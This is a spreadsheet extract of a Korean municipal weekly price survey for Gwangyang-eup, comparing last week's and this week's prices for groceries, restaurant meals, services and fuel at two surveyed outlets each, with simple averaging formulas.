A80: 45 | B80: 콘도미니엄 이용료 | C80: 25평정도 회원기준 1실 1일 사용 | D80: =COUNTIF(J80,"<>0")+COUNTIF(N80,"<>0") -> 0 | E80: =COUNTIF(K80,"<>0")+COUNTIF(O80,"<>0") -> 0 | F80: =IF(D80=0,0,SUM(J80,N80)/D80) -> 0 | G80: =IF(E80=0,0,SUM(K80,O80)/E80) -> 0 | H80: =G80-F80 -> 0 | J80: 0 | K80: 0 | L80: =K80-J80 -> 0 | N80: 0 | O80: 0 | P80: =O80-N80 -> 0
A81: 46 | B81: PC방 이용료 | C81: 1회 이용시 | D81: =COUNTIF(J81,"<>0")+COUNTIF(N81,"<>0") -> 2 | E81: =COUNTIF(K81,"<>0")+COUNTIF(O81,"<>0") -> 2 | F81: =IF(D81=0,0,SUM(J81,N81)/D81) -> 1,350 | G81: =IF(E81=0,0,SUM(K81,O81)/E81) -> 1,350 | H81: =G81-F81 -> 0 | I81: 미스터케이PC | J81: 1,200 | K81: 1,200 | L81: =K81-J81 -> 0 | M81: 아이센스PC방 | N81: 1,500 | O81: 1,500 | P81: =O81-N81 -> 0
A82: 47 | B82: 택배이용료 | C82: 20kg이하, 타지역 | D82: =COUNTIF(J82,"<>0")+COUNTIF(N82,"<>0") -> 2 | E82: =COUNTIF(K82,"<>0")+COUNTIF(O82,"<>0") -> 2 | F82: =IF(D82=0,0,SUM(J82,N82)/D82) -> 7,000 | G82: =IF(E82=0,0,SUM(K82,O82)/E82) -> 7,000 | H82: =G82-F82 -> 0 | I82: 건영택배 | J82: 7,000 | K82: 7,000 | L82: =K82-J82 -> 0 | M82: 현대택배 | N82: 7,000 | O82: 7,000 | P82: =O82-N82 -> 0
A83: 48 | B83: 찜질방 이용료 | C83: 찜질방(성인 1회) (1회용품 제외) | D83: =COUNTIF(J83,"<>0")+COUNTIF(N83,"<>0") -> 0 | E83: =COUNTIF(K83,"<>0")+COUNTIF(O83,"<>0") -> 0 | F83: =IF(D83=0,0,SUM(J83,N83)/D83) -> 0 | G83: =IF(E83=0,0,SUM(K83,O83)/E83) -> 0 | H83: =G83-F83 -> 0 | J83: 0 | K83: 0 | L83: =K83-J83 -> 0 | N83: 0 | O83: 0 | P83: =O83-N83 -> 0
A84: 49 | B84: 대입학원비(종합) | C84: 대입(4년제)재수생 종합반 수강료 | D84: =COUNTIF(J84,"<>0")+COUNTIF(N84,"<>0") -> 0 | E84: =COUNTIF(K84,"<>0")+COUNTIF(O84,"<>0") -> 0 | F84: =IF(D84=0,0,SUM(J84,N84)/D84) -> 0 | G84: =IF(E84=0,0,SUM(K84,O84)/E84) -> 0 | H84: =G84-F84 -> 0 | J84: 0 | K84: 0 | L84: =K84-J84 -> 0 | N84: 0 | O84: 0 | P84: =O84-N84 -> 0
A85: 공산품 등 기타(13개품목)
A86: 1 | B86: 밀가루 | C86: 중력분 1등품 (1봉지 3kg) | D86: =COUNTIF(J86,"<>0")+COUNTIF(N86,"<>0") -> 2 | E86: =COUNTIF(K86,"<>0")+COUNTIF(O86,"<>0") -> 2 | F86: =IF(D86=0,0,SUM(J86,N86)/D86) -> 5,470 | G86: =IF(E86=0,0,SUM(K86,O86)/E86) -> 5,470 | H86: =G86-F86 -> 0 | I86: 농협하나로마트 | J86: 5,350 | K86: 5,350 | L86: =K86-J86 -> 0 | M86: 트라이얼코리아 | N86: 5,590 | O86: 5,590 | P86: =O86-N86 -> 0
A87: 2 | B87: 두부 | C87: 공장제품 1모 | D87: =COUNTIF(J87,"<>0")+COUNTIF(N87,"<>0") -> 1 | E87: =COUNTIF(K87,"<>0")+COUNTIF(O87,"<>0") -> 1 | F87: =IF(D87=0,0,SUM(J87,N87)/D87) -> 1,450 | G87: =IF(E87=0,0,SUM(K87,O87)/E87) -> 1,450 | H87: =G87-F87 -> 0 | I87: 농협하나로마트 | J87: 0 | K87: 0 | L87: =K87-J87 -> 0 | M87: 트라이얼코리아 | N87: 1,450 | O87: 1,450 | P87: =O87-N87 -> 0
A88: 3 | B88: 우유 | C88: 흰 우유(종이팩) 1개 200㎖ | D88: =COUNTIF(J88,"<>0")+COUNTIF(N88,"<>0") -> 2 | E88: =COUNTIF(K88,"<>0")+COUNTIF(O88,"<>0") -> 2 | F88: =IF(D88=0,0,SUM(J88,N88)/D88) -> 1,135 | G88: =IF(E88=0,0,SUM(K88,O88)/E88) -> 1,135 | H88: =G88-F88 -> 0 | I88: 농협하나로마트 | J88: 1,080 | K88: 1,080 | L88: =K88-J88 -> 0 | M88: 트라이얼코리아 | N88: 1,190 | O88: 1,190 | P88: =O88-N88 -> 0
A89: 4 | B89: 식용유 | C89: 콩기름 1.8ml | D89: =COUNTIF(J89,"<>0")+COUNTIF(N89,"<>0") -> 2 | E89: =COUNTIF(K89,"<>0")+COUNTIF(O89,"<>0") -> 2 | F89: =IF(D89=0,0,SUM(J89,N89)/D89) -> 7,735 | G89: =IF(E89=0,0,SUM(K89,O89)/E89) -> 7,735 | H89: =G89-F89 -> 0 | I89: 농협하나로마트 | J89: 6,980 | K89: 6,980 | L89: =K89-J89 -> 0 | M89: 트라이얼코리아 | N89: 8,490 | O89: 8,490 | P89: =O89-N89 -> 0
A90: 5 | B90: 설탕 | C90: 정백당 1kg | D90: =COUNTIF(J90,"<>0")+COUNTIF(N90,"<>0") -> 2 | E90: =COUNTIF(K90,"<>0")+COUNTIF(O90,"<>0") -> 2 | F90: =IF(D90=0,0,SUM(J90,N90)/D90) -> 2,935 | G90: 2,935 | H90: =G90-F90 -> 0 | I90: 농협하나로마트 | J90: 2,380 | K90: 2,380 | L90: =K90-J90 -> 0 | M90: 트라이얼코리아 | N90: 3,490 | O90: 3,490 | P90: =O90-N90 -> 0
A91: 6 | B91: 생수 | C91: 플라스틱 1병(500㎖) | D91: =COUNTIF(J91,"<>0")+COUNTIF(N91,"<>0") -> 2 | E91: =COUNTIF(K91,"<>0")+COUNTIF(O91,"<>0") -> 2 | F91: =IF(D91=0,0,SUM(J91,N91)/D91) -> 320 | G91: =IF(E91=0,0,SUM(K91,O91)/E91) -> 320 | H91: =G91-F91 -> 0 | I91: 농협하나로마트 | J91: 250 | K91: 250 | L91: =K91-J91 -> 0 | M91: 트라이얼코리아 | N91: 390 | O91: 390 | P91: =O91-N91 -> 0
A92: 7 | B92: 맥주 | C92: 1병 500㎖ (병 보증금 포함) | D92: =COUNTIF(J92,"<>0")+COUNTIF(N92,"<>0") -> 2 | E92: =COUNTIF(K92,"<>0")+COUNTIF(O92,"<>0") -> 2 | F92: =IF(D92=0,0,SUM(J92,N92)/D92) -> 1,680 | G92: =IF(E92=0,0,SUM(K92,O92)/E92) -> 1,680 | H92: =G92-F92 -> 0 | I92: 농협하나로마트 | J92: 1,670 | K92: 1,670 | L92: =K92-J92 -> 0 | M92: 트라이얼코리아 | N92: 1,690 | O92: 1,690 | P92: =O92-N92 -> 0
A93: 8 | B93: 소주 | C93: 1병 360㎖ (병 보증금 포함) | D93: =COUNTIF(J93,"<>0")+COUNTIF(N93,"<>0") -> 2 | E93: =COUNTIF(K93,"<>0")+COUNTIF(O93,"<>0") -> 2 | F93: =IF(D93=0,0,SUM(J93,N93)/D93) -> 1,405 | G93: =IF(E93=0,0,SUM(K93,O93)/E93) -> 1,405 | H93: =G93-F93 -> 0 | I93: 농협하나로마트 | J93: 1,430 | K93: 1,430 | L93: =K93-J93 -> 0 | M93: 트라이얼코리아 | N93: 1,380 | O93: 1,380 | P93: =O93-N93 -> 0
A94: 9 | B94: 등유 | C94: 주유소 판매 1ℓ | D94: =COUNTIF(J94,"<>0")+COUNTIF(N94,"<>0") -> 2 | E94: =COUNTIF(K94,"<>0")+COUNTIF(O94,"<>0") -> 2 | F94: =IF(D94=0,0,SUM(J94,N94)/D94) -> 1,400 | G94: =IF(E94=0,0,SUM(K94,O94)/E94) -> 1,400 | H94: =G94-F94 -> 0 | I94: 역전주유소 | J94: 1,400 | K94: 1,400 | L94: =K94-J94 -> 0 | M94: 황금주유소 | N94: 1,400 | O94: 1,400 | P94: =O94-N94 -> 0
A95: 10 | B95: 경유 | C95: 주유소 판매 1ℓ | D95: =COUNTIF(J95,"<>0")+COUNTIF(N95,"<>0") -> 2 | E95: =COUNTIF(K95,"<>0")+COUNTIF(O95,"<>0") -> 2 | F95: =IF(D95=0,0,SUM(J95,N95)/D95) -> 1,570 | G95: =IF(E95=0,0,SUM(K95,O95)/E95) -> 1,526 | H95: =G95-F95 -> -44 | I95: 역전주유소 | J95: 1,575 | K95: 1,527 | L95: =K95-J95 -> -48 | M95: 황금주유소 | N95: 1,565 | O95: 1,525 | P95: =O95-N95 -> -40
A96: 11 | B96: 휘발유 | C96: 주유소 판매 1ℓ (무연) | D96: =COUNTIF(J96,"<>0")+COUNTIF(N96,"<>0") -> 2 | E96: =COUNTIF(K96,"<>0")+COUNTIF(O96,"<>0") -> 2 | F96: =IF(D96=0,0,SUM(J96,N96)/D96) -> 1,615 | G96: =IF(E96=0,0,SUM(K96,O96)/E96) -> 1,566 | H96: =G96-F96 -> -49 | I96: 역전주유소 | J96: 1,625 | K96: 1,567 | L96: =K96-J96 -> -58 | M96: 황금주유소 | N96: 1,605 | O96: 1,565 | P96: =O96-N96 -> -40
A97: 12 | B97: 피아노 학원비 | C97: 관인학원 (초급반 1개월) | D97: =COUNTIF(J97,"<>0")+COUNTIF(N97,"<>0") -> 2 | E97: =COUNTIF(K97,"<>0")+COUNTIF(O97,"<>0") -> 2 | F97: =IF(D97=0,0,SUM(J97,N97)/D97) -> 130,000 | G97: =IF(E97=0,0,SUM(K97,O97)/E97) -> 130,000 | H97: =G97-F97 -> 0 | I97: 믿음음악학원 | J97: 130,000 | K97: 130,000 | L97: =K97-J97 -> 0 | M97: 에쎌피아노 | N97: 130,000 | O97: 130,000 | P97: =O97-N97 -> 0
A98: 13 | B98: 미술학원비 | C98: 초등 저학년 1개월 (재료비 포함) | D98: =COUNTIF(J98,"<>0")+COUNTIF(N98,"<>0") -> 2 | E98: =COUNTIF(K98,"<>0")+COUNTIF(O98,"<>0") -> 2 | F98: =IF(D98=0,0,SUM(J98,N98)/D98) -> 145,000 | G98: =IF(E98=0,0,SUM(K98,O98)/E98) -> 145,000 | H98: =G98-F98 -> 0 | I98: 아트하트학원 | J98: 150,000 | K98: 150,000 | L98: =K98-J98 -> 0 | M98: 아이피카소 | N98: 140,000 | O98: 140,000 | P98: =O98-N98 -> 0

Sheet 광양읍2
A2: 주 간 물 가 동 향(광양읍)
M3: 조사자 : 김국희
A4: 연번 | B4: 품목 | C4: 규격·단위 | F4: 평 균 | I4: 조 사 1 지 역(광양마트) | M4: 조 사 2 지 역(시장)
F5: 전주 | G5: 금주 | H5: 증감액 | I5: 조 사 처 | J5: 전주 | K5: 금주 | L5: 증감액 | M5: 조 사 처 | N5: 전주 | P5: 증감액
A6: 농·축·수산물(28개 품목)
A7: 1 | B7: 쌀 | C7: 일반미 20kg(광양좋은쌀) | D7: =COUNTIF(J7,"<>0")+COUNTIF(N7,"<>0") -> 2 | E7: =COUNTIF(K7,"<>0")+COUNTIF(O7,"<>0") -> 2 | F7: =IF(D7=0,0,SUM(J7,N7)/D7) -> 60500 | G7: =IF(E7=0,0,SUM(K7,O7)/E7) -> 60500 | H7: =G7-F7 -> 0 | I7: 광양마트 | J7: 65000 | K7: 65000 | L7: =K7-J7 -> 0 | M7: 시장 | N7: 56000 | O7: 56000 | P7: =O7-N7 -> 0
A8: 2 | B8: 무 | C8: 상품 1개(1㎏) | D8: =COUNTIF(J8,"<>0")+COUNTIF(N8,"<>0") -> 2 | E8: 2 | F8: =IF(D8=0,0,SUM(J8,N8)/D8) -> 1950 | G8: 2250 | H8: =G8-F8 -> 300 | I8: 광양마트 | J8: 1900 | K8: 2500 | L8: =K8-J8 -> 600 | M8: 시장 | N8: 2000 | O8: 2000 | P8: =O8-N8 -> 0
A9: 3 | B9: 상추 | C9: 잎상추 500g | D9: 2 | E9: 2 | F9: 7250 | G9: 6750 | H9: =G9-F9 -> -500 | I9: 광양마트 | J9: 9500 | K9: 8500 | L9: -1000 | M9: 시장 | N9: 5000 | O9: 5000 | P9: 0
A10: 4 | B10: 양상추 | C10: 상품1개(350~400g) | D10: 2 | E10: 2 | F10: 3050 | G10: 3050 | H10: =G10-F10 -> 0 | I10: 로컬푸드 | J10: 2100 | K10: 2100 | L10: 0 | M10: 시장 | N10: 4000 | O10: 4000 | P10: 0
A11: 5 | B11: 애호박 | C11: 상품1개(300~350g) | D11: 2 | E11: 2 | F11: 2400 | G11: 2400 | H11: =G11-F11 -> 0 | I11: 광양마트 | J11: 2800 | K11: 2800 | L11: 0 | M11: 시장 | N11: 2000 | O11: 2000 | P11: 0
A12: 6 | B12: 열무 | C12: 상품 4kg(1단) | D12: 2 | E12: 2 | F12: 9400 | G12: 9400 | H12: =G12-F12 -> 0 | I12: 로컬푸드 | J12: 8800 | K12: 8800 | L12: 0 | M12: 시장 | N12: 10000 | O12: 10000 | P12: 0
A13: 7 | B13: 양파 | C13: 1망 1kg | D13: 2 | E13: 2 | F13: 3700 | G13: 3700 | H13: =G13-F13 -> 0 | I13: 광양마트 | J13: 3900 | K13: 3900 | L13: 0 | M13: 시장 | N13: 3500 | O13: 3500 | P13: 0
A14: 8 | B14: 오이 | C14: 상품 3개 | D14: 2 | E14: 2 | F14: 4875 | G14: 5175 | H14: 300 | I14: 광양마트 | J14: 6750 | K14: 7350 | L14: 600 | M14: 시장 | N14: 3000 | O14: 3000 | P14: 0
A15: 9 | B15: 풋고추 | C15: 신선한것 1kg | D15: 2 | E15: 2 | F15: 14250 | G15: 12500 | H15: -1750 | I15: 광양마트(청양) | J15: 18500 | K15: 15000 | L15: -3500 | M15: 시장 | N15: 10000 | O15: 10000 | P15: 0
A16: 10 | B16: 마늘 | C16: 깐것 상품 1kg | D16: 2 | E16: 2 | F16: 13000 | G16: 13000 | H16: 0 | I16: 광양마트 | J16: 16000 | K16: 16000 | L16: 0 | M16: 시장 | N16: 10000 | O16: 10000 | P16: 0
A17: 11 | B17: 감자 | C17: 흰색 1kg | D17: 2 | E17: 2 | F17: 4750 | G17: 4500 | H17: -250 | I17: 광양마트 | J17: 5000 | K17: 4500 | L17: -500 | M17: 시장 | N17: 4500 | O17: 4500 | P17: 0
A18: 12 | B18: 배추 | C18: 1포기 3kg | D18: =COUNTIF(J18,"<>0")+COUNTIF(N18,"<>0") -> 2 | E18: 2 | F18: 3500 | G18: 3000 | H18: -500 | I18: 로컬푸드 | J18: 3000 | K18: 3000 | L18: 0 | M18: 시장 | N18: 4000 | O18: 3000 | P18: -1000
A19: 13 | B19: 콩나물 | C19: 1봉지 500g | D19: 2 | E19: 2 | F19: 2000 | G19: 2000 | H19: 0 | I19: 광양마트 | J19: 2000 | K19: 2000 | L19: 0 | M19: 시장 | N19: 2000 | O19: 2000 | P19: 0
A20: 14 | B20: 사과 | C20: 상품 1개(300∼350g) | D20: 2 | E20: 2 | F20: 3250 | G20: 3625 | H20: 375 | I20: 광양마트 | J20: 3000 | K20: 3750 | L20: 750 | M20: 로컬푸드 | N20: 3500 | O20: 3500 | P20: 0
A21: 15 | B21: 배 | C21: 상품 1개(650∼700g) | D21: 2 | E21: 2 | F21: 3775 | G21: 3400 | H21: -375 | I21: 광양마트 | J21: 3750 | K21: 3000 | L21: -750 | M21: 로컬푸드 | N21: 3800 | O21: 3800 | P21: 0
A22: 16 | B22: 바나나 | C22: 상품 1kg | D22: 2 | E22: 2 | F22: 3900 | G22: 3900 | H22: 0 | I22: 광양마트 | J22: 4000 | K22: 4000 | L22: 0 | M22: 로컬푸드 | N22: 3800 | O22: 3800 | P22: 0
A23: 17 | B23: 쇠고기 (한우) | C23: 등심 600g(상등육) | D23: 2 | E23: 2 | F23: 60000 | G23: 57500 | H23: -2500 | I23: 로컬푸드 | J23: 60000 | K23: 57000 | L23: -3000 | M23: 시장(정육점) | N23: 60000 | O23: 58000 | P23: -2000
A24: 18 | B24: 쇠고기 (수입육) | C24: 등심 600g(상등육) | D24: 2 | E24: 2 | F24: 27900 | G24: 27900 | H24: 0 | I24: 광양마트 | J24: 40800 | K24: 40800 | L24: 0 | M24: 시장(정육점) | N24: 15000 | O24: 15000 | P24: 0
A25: 19 | B25: 돼지고기 | C25: 삼겹살 600g(상등육) | D25: 2 | E25: 2 | F25: 16750 | G25: 16150 | H25: -600 | I25: 광양마트 | J25: 15500 | K25: 15300 | L25: -200 | M25: 시장(정육점) | N25: 18000 | O25: 17000 | P25: -1000
A26: 20 | B26: 닭고기 | C26: 육계 1마리(1kg 정도) | D26: 2 | E26: 2 | F26: 8300 | G26: 8250 | H26: -50 | I26: 광양마트 | J26: 7600 | K26: 7500 | L26: =K26-J26 -> -100 | M26: 시장 | N26: 9000 | O26: 9000 | P26: 0
A27: 21 | B27: 달걀 | C27: 특란 30개 한판 | D27: 2 | E27: 2 | F27: 8400 | G27: 8400 | H27: 0 | I27: 광양마트 | J27: 9800 | K27: 9800 | L27: 0 | M27: 시장 | N27: 7000 | O27: 7000 | P27: 0
A28: 22 | B28: 조기 | C28: 15cm 1마리 | D28: =COUNTIF(J28,"<>0")+COUNTIF(N28,"<>0") -> 2 | E28: 2 | F28: 2750 | G28: 2750 | H28: 0 | I28: 광양마트 | J28: 2500 | K28: 2500 | L28: 0 | M28: 시장 | N28: 3000 | O28: 3000 | P28: 0
A29: 23 | B29: 갈치 | C29: 60cm 1마리 | D29: 2 | E29: 2 | F29: 11500 | G29: 11500 | H29: 0 | I29: 광양마트 | J29: 11000 | K29: 11000 | L29: 0 | M29: 시장 | N29: 12000 | O29: 12000 | P29: 0
A30: 24 | B30: 명태 | C30: 40cm 1마리 | D30: 2 | E30: 2 | F30: 4700 | G30: 4700 | H30: 0 | I30: 광양마트 | J30: 4900 | K30: 4900 | L30: 0 | M30: 시장 | N30: 4500 | O30: 4500 | P30: 0
A31: 25 | B31: 고등어 | C31: 30cm 1마리 | D31: =COUNTIF(J31,"<>0")+COUNTIF(N31,"<>0") -> 2 | E31: 2 | F31: 4550 | G31: 4550 | H31: 0 | I31: 광양마트 | J31: 5600 | K31: 5600 | L31: 0 | M31: 시장 | N31: 3500 | O31: 3500 | P31: 0
A32: 26 | B32: 냉동오징어 | C32: 30cm 1마리 | D32: 2 | E32: 2 | F32: 4700 | G32: 4700 | H32: 0 | I32: 광양마트 | J32: 4400 | K32: 4400 | L32: 0 | M32: 시장 | N32: 5000 | O32: 5000 | P32: 0
A33: 27 | B33: 콩 | C33: 상품 1kg | D33: 2 | E33: 2 | H33: 0 | I33: 로컬푸드 | J33: 8500 | K33: 8500 | L33: 0 | M33: 시장 | N33: 8300 | O33: 8300 | P33: 0
A34: 28 | B34: 고춧가루 | C34: 상품 3kg | D34: 2 | E34: 2 | H34: 0 | I34: 광양마트 | J34: 110000 | K34: 110000 | L34: 0 | M34: 시장 | N34: 90000 | O34: 90000 | P34: 0
A35: 개인서비스 요금(49개 품목)
A36: 1 | B36: 설렁탕 | C36: 1인분 (보통) | D36: =COUNTIF(J36,"<>0")+COUNTIF(N36,"<>0") -> 2 | E36: =COUNTIF(K36,"<>0")+COUNTIF(O36,"<>0") -> 2 | F36: =IF(D36=0,0,SUM(J36,N36)/D36) -> 9000 | G36: =IF(E36=0,0,SUM(K36,O36)/E36) -> 9000 | H36: =G36-F36 -> 0 | I36: 이정재식육식당(곰탕) | J36: 9000 | K36: 9000 | L36: 0 | M36: 종갓집국밥 | N36: 9000 | O36: 9000 | P36: 0
A37: 2 | B37: 냉면 | C37: 물냉면, 1인분(보통) | D37: =COUNTIF(J37,"<>0")+COUNTIF(N37,"<>0") -> 2 | E37: 2 | F37: =IF(D37=0,0,SUM(J37,N37)/D37) -> 9000 | G37: 9000 | H37: =G37-F37 -> 0 | I37: 진주냉면 | J37: 10000 | K37: 10000 | L37: 0 | M37: 대갓집 | N37: 8000 | O37: 8000 | P37: 0
A38: 3 | B38: 비빔밥 | C38: 1인분(보통) | D38: 2 | E38: 2 | F38: 8000 | G38: 8000 | H38: 0 | I38: 전주비빔밥 | J38: 9000 | K38: 9000 | L38: 0 | M38: 사랑분식 | N38: 7000 | O38: 7000 | P38: 0
A39: 4 | B39: 갈비탕 | C39: 1인분(보통) | D39: 2 | E39: 2 | F39: 11500 | G39: 11500 | H39: 0 | I39: 진주냉면 | J39: 12000 | K39: 12000 | L39: 0 | M39: 대갓집 | N39: 11000 | O39: 11000 | P39: 0
A40: 5 | B40: 삼계탕 | C40: 1인분(보통) | D40: 2 | E40: 2 | F40: 13500 | G40: 13500 | H40: 0 | I40: 수양정 | J40: 13000 | K40: 13000 | L40: 0 | M40: 황제삼계탕 | N40: 14000 | O40: 14000 | P40: 0
A41: 6 | B41: 된장찌개 백반 | C41: 1인분(보통) | D41: 2 | E41: 2 | F41: 8000 | G41: 8000 | H41: 0 | I41: 금송숯불구이 | J41: 8000 | K41: 8000 | L41: 0 | M41: 만수정 | N41: 8000 | O41: 8000 | P41: 0
A42: 7 | B42: 김치찌개 백반 | C42: 1인분(보통) | D42: 2 | E42: 2 | F42: 8500 | G42: 8500 | H42: 0 | I42: 금송숯불구이 | J42: 8000 | K42: 8000 | L42: 0 | M42: 만수정 | N42: 9000 | O42: 9000 | P42: 0
A43: 8 | B43: 불고기 | C43: 1인분(200g) 공기밥 제외 | D43: 2 | E43: 2 | F43: 27000 | G43: 27000 | H43: 0 | I43: 행복한 한우 | J43: 27000 | K43: 27000 | L43: 0 | M43: 삼대불고기 | N43: 27000 | O43: 27000 | P43: 0
A44: 9 | B44: 등심구이 | C44: 1인분(200g) 공기밥 제외 | D44: 2 | E44: 2 | F44: 46000 | G44: 46000 | H44: 0 | I44: ok목장 | J44: 36000 | K44: 36000 | L44: 0 | M44: 백운뜰 | N44: 56000 | O44: 56000 | P44: 0
A45: 10 | B45: 생선초밥 | C45: 1인분(보통), 활어기준 | D45: 2 | E45: 2 | F45: 17000 | G45: 17000 | H45: 0 | I45: 먹어섬 | J45: 14000 | K45: 14000 | L45: 0 | M45: 정스시 | N45: 20000 | O45: 20000 | P45: 0
A46: 11 | B46: 튀김닭 | C46: 양념통닭 1마리 | D46: 2 | E46: 2 | F46: 18500 | G46: 18500 | H46: 0 | I46: 바로커치킨 | J46: 19000 | K46: 19000 | L46: 0 | M46: 냠냠닭컴 | N46: 18000 | O46: 18000 | P46: 0
A47: 12 | B47: 칼국수 | C47: 1인분(보통) | D47: 2 | E47: 2 | F47: 7250 | G47: 7250 | H47: 0 | I47: 토박이 | J47: 8000 | K47: 8000 | L47: 0 | M47: 사랑분식 | N47: 6500 | O47: 6500 | P47: 0
A48: 13 | B48: 조리라면 | C48: 분식점 1인분 | D48: 2 | E48: 2 | F48: 4000 | G48: 4000 | H48: 0 | I48: 사랑분식 | J48: 4000 | K48: 4000 | L48: 0 | M48: 바오밥 | N48: 4000 | O48: 4000 | P48: 0
A49: 14 | B49: 김밥 | C49: 분식점 1인분 | D49: 2 | E49: 2 | F49: 3250 | G49: 3250 | H49: 0 | I49: 사랑분식 | J49: 3000 | K49: 3000 | L49: 0 | M49: 바오밥 | N49: 3500 | O49: 3500 | P49: 0
A50: 15 | B50: 짜장면 | C50: 1인분(보통) | D50: 2 | E50: 2 | F50: 6000 | G50: 6000 | H50: 0 | I50: 행복한젠시오 | J50: 6000 | K50: 6000 | L50: 0 | M50: 신흥일각 | N50: 6000 | O50: 6000 | P50: 0
A51: 16 | B51: 짬뽕 | C51: 1인분(보통) | D51: 2 | E51: 2 | F51: 8000 | G51: 8000 | H51: 0 | I51: 행복한젠시오 | J51: 8000 | K51: 8000 | L51: 0 | M51: 신흥일각 | N51: 8000 | O51: 8000 | P51: 0
A52: 17 | B52: 탕수육 | C52: 일반탕수육(보통) | D52: 2 | E52: 2 | F52: 27000 | G52: 27000 | H52: 0 | I52: 행복한젠시오 | J52: 27000 | K52: 27000 | L52: 0 | M52: 신흥일각 | N52: 27000 | O52: 27000 | P52: 0
A53: 18 | B53: 돈가스 | C53: 일반돈가스,1인분 | D53: 2 | E53: 2 | F53: 10000 | G53: 10000 | H53: 0 | I53: 사랑분식 | J53: 8000 | K53: 8000 | L53: 0 | M53: 피노아르떼소나무집 | N53: 12000 | O53: 12000 | P53: 0
A54: 19 | B54: 햄버거 | C54: 기본형(야채,고기) | D54: 2 | E54: 2 | F54: 4100 | G54: 4100 | H54: 0 | I54: 롯데리아 | J54: 4700 | K54: 4700 | L54: 0 | M54: 맘앤파파 | N54: 3500 | O54: 3500 | P54: 0
A55: 20 | B55: 피자 | C55: 기본형(야채,고기) | D55: 2 | E55: 2 | F55: 13900 | G55: 13900 | H55: 0 | I55: 피자스쿨 | J55: 13900 | K55: 13900 | L55: 0 | M55: 피자마루 | N55: 13900 | O55: 13900 | P55: 0
A56: 21 | B56: 커피(외식) | C56: 일반원두커피 | D56: 2 | E56: 2 | F56: 3150 | G56: 3150 | H56: 0 | I56: 까페345 | J56: 2500 | K56: 2500 | L56: 0 | M56: 코코베르나 | N56: 3800 | O56: 3800 | P56: 0
A57: 22 | B57: 국산차(외식) | C57: 녹차(티백 또는 잎녹차) | D57: 2 | E57: 2 | F57: 4500 | G57: 4500 | H57: 0 | I57: 까페345 | J57: 4500 | K57: 4500 | L57: 0 | M57: 코코베르나 | N57: 4500 | O57: 4500 | P57: 0
A58: 23 | B58: 삼겹살 | C58: 식육식당 200g(국내산) | D58: 2 | E58: 2 | F58: 15300 | G58: 15300 | H58: 0 | I58: 만수정 | J58: 17300 | K58: 17300 | L58: 0 | M58: 금송 | N58: 13300 | O58: 13300 | P58: 0
A59: 24 | B59: 돼지갈비 | C59: 식육식당 200g(국내산) | D59: 2 | E59: 2 | F59: 13000 | G59: 13000 | H59: 0 | I59: 대갓집 | J59: 14000 | K59: 14000 | L59: 0 | M59: 금송 | N59: 12000 | O59: 12000 | P59: 0
A60: 25 | B60: 갈비살 | C60: 식육식당 200g(국내산) | D60: 2 | E60: 2 | F60: 44925 | G60: 44925 | H60: 0 | I60: ok목장 | J60: 36000 | K60: 36000 | L60: 0 | M60: 금목서 | N60: 53850 | O60: 53850 | P60: 0
A61: 26 | B61: 생맥주 | C61: 500CC 1잔 | D61: 2 | E61: 2 | F61: 4000 | G61: 4000 | H61: 0 | I61: 바로커치킨 | J61: 4000 | K61: 4000 | L61: 0 | M61: 냠냠닭컴 | N61: 4000 | O61: 4000 | P61: 0
A62: 27 | B62: 공동 주택관리비 | C62: 주공 18평1개월 (공과금 제외) | D62: 2 | E62: 2 | F62: 53452.5 | G62: 53452.5 | H62: 0 | I62: 칠성주공a | J62: 57900 | K62: 57900 | L62: 0 | M62: 부영아파트 | N62: 49005 | O62: 49005 | P62: 0
A63: 28 | B63: 양 복 세탁료 | C63: 신사복 상·하 드라이크리닝 1회 | D63: 2 | E63: 2 | F63: 8000 | G63: 8000 | H63: 0 | I63: 매화세탁소 | J63: 9000 | K63: 9000 | L63: 0 | M63: 강남세탁소 | N63: 7000 | O63: 7000 | P63: 0
A64: 29 | B64: 의복수선료 | C64: 신사복 바지 밑단줄임 1회 | D64: 2 | E64: 2 | F64: 5000 | G64: 5000 | H64: 0 | I64: 매화세탁소 | J64: 6000 | K64: 6000 | L64: 0 | M64: 강남세탁소 | N64: 4000 | O64: 4000 | P64: 0
A65: 30 | B65: 영화관람요 (방화. 외화) | C65: 상영시간 100분정도 1회 (입장세,문예진흥기금포함) | D65: 2 | E65: 2 | F65: 0 | G65: 0 | H65: 0 | L65: 0 | P65: 0
A66: 31 | B66: 경기장 입장료 | C66: 공공체육시설 (성인 1인) | D66: 2 | E66: 2 | F66: 0 | G66: 0 | H66: 0 | L66: 0 | P66: 0
A67: 32 | B67: 수영장 이용료 | C67: 일반성인 1회 (체육기금 포함) | D67: 2 | E67: 2 | F67: 0 | G67: 0 | H67: 0 | L67: 0 | P67: 0
A68: 33 | B68: 볼링장 이용료 | C68: 일반성인 평일오후 1게임 | D68: 2 | E68: 2 | F68: 2000 | G68: 2000 | H68: 0 | I68: 칠성볼링장 | J68: 4000 | K68: 4000 | L68: 0 | P68: 0
A69: 34 | B69: 골프연습장 이용료 | C69: 초급(남자회원)1개월 (레슨비 미포함) | D69: 2 | E69: 2 | F69: 75000 | G69: 75000 | H69: 0 | I69: 덕산골프장 | J69: 150000 | K69: 150000 | L69: 0 | P69: 0
A70: 35 | B70: 노래방 이용료 | C70: 일반인 저녁 1시간 | D70: 2 | E70: 2 | F70: 25000 | G70: 25000 | H70: 0 | I70: 칠성노래방 | J70: 25000 | K70: 25000 | L70: 0 | M70: 고래고래 | N70: 25000 | O70: 25000 | P70: 0
A71: 36 | B71: 당구장 이용료 | C71: 큐선대 일반인 저녁 1시간 | D71: 2 | E71: 2 | F71: 10900 | G71: 10900 | H71: 0 | I71: 월드당구장 | J71: 11000 | K71: 11000 | L71: 0 | M71: 자니스당구장 | N71: 10800 | O71: 10800 | P71: 0
A72: 37 | B72: 사진촬영료 | C72: 칼라 반명함 1조 (상급사진관 3x4) | D72: 2 | E72: 2 | F72: 18500 | G72: 18500 | H72: 0 | I72: 리사진관 | J72: 17000 | K72: 17000 | L72: 0 | M72: 중앙사진관 | N72: 20000 | O72: 20000 | P72: 0
A73: 38 | B73: 사진인화료 | C73: 디지털사진인화요금, 현상료 포함 | D73: 2 | E73: 2 | F73: 400 | G73: 400 | H73: 0 | I73: 리사진관 | J73: 300 | K73: 300 | L73: 0 | M73: 중앙사진관 | N73: 500 | O73: 500 | P73: 0
A74: 39 | B74: 영상매체대여료 | C74: 최신판 영화 DVD대여요금 | D74: 1 | E74: 1 | F74: 0 | G74: 0 | H74: 0 | I74: 대여클럽 | J74: 0 | K74: 0 | L74: 0 | P74: 0
